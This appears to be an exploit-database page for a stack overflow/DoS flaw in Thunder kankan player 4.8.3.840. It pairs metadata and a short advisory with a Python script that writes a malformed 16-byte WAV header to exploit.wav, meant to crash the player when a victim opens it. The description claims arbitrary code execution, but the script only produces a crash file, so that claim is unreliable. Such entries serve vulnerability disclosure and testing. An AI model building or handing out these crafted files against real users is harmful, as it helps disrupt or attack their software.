Thunder kankan player Stack overflow/DOS Exploit

vendor:

Thunder kankan player

by:

hellok

7.5

CVSS

HIGH

Stack overflow/DOS

119

CWE

Product Name: Thunder kankan player

Affected Version From: 4.8.3.840

Affected Version To: 4.8.3.840

Patch Exists: YES

Related CWE: N/A

CPE: a:xunlei:thunder_kankan_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WIN 7

2011

Thunder kankan player Stack overflow/DOS Exploit

A stack overflow/DOS vulnerability exists in Thunder kankan player version 4.8.3.840. An attacker can exploit this vulnerability by creating a malicious .wav file and sending it to the victim. When the victim opens the malicious .wav file, the attacker can execute arbitrary code on the victim's system.

Mitigation:

Upgrade to the latest version of Thunder kankan player.

Source

Exploit-DB raw data:

#!/usr/bin/env python
print """
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0      ___           ___           ___       ___       ___           ___     1
#1     /\__\         /\  \         /\__\     /\__\     /\  \         /\__\    0
#0    /:/  /        /::\  \       /:/  /    /:/  /    /::\  \       /:/  /    1
#1   /:/__/        /:/\:\  \     /:/  /    /:/  /    /:/\:\  \     /:/__/     0
#0  /::\  \ ___   /::\~\:\  \   /:/  /    /:/  /    /:/  \:\  \   /::\__\____ 1
#1 /:/\:\  /\__\ /:/\:\ \:\__\ /:/__/    /:/__/    /:/__/ \:\__\ /:/\:::::\__\0
#0 \/__\:\/:/  / \:\~\:\ \/__/ \:\  \    \:\  \    \:\  \ /:/  / \/_|:|~~|~   1
#1      \::/  /   \:\ \:\__\    \:\  \    \:\  \    \:\  /:/  /     |:|  |    0
#0      /:/  /     \:\ \/__/     \:\  \    \:\  \    \:\/:/  /      |:|  |    1
#1     /:/  /       \:\__\        \:\__\    \:\__\    \::/  /       |:|  |    0
#0     \/__/         \/__/         \/__/     \/__/     \/__/         \|__|    1
#1                                                                            0
#0  [+] Exploit Title: Thunder kankan player Stack overflow/DOS Exploit       1
#1  [+] Date :11/17/2011                                                      0
#0  [+] Author:  hellok(warptencq[dot]gmail.com)                              1
#1  [+] Software Link: dl.xunlei.com/xmp.html                                 0
#0  [+] Version :   4.8.3.840(last)                                           1
#1  [+] Tested On:  WIN 7                                                     0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-1
"""
filepath = "exploit.wav"
f = open(filepath, "wb")
file = '\x52\x49\x46\x46\x62\xb8\x20\x20\x57\x41\x56\x45\x66\x6d\x74\x20'
f.write(file)
f.close()

print "Done.\nOpen exploit.wav"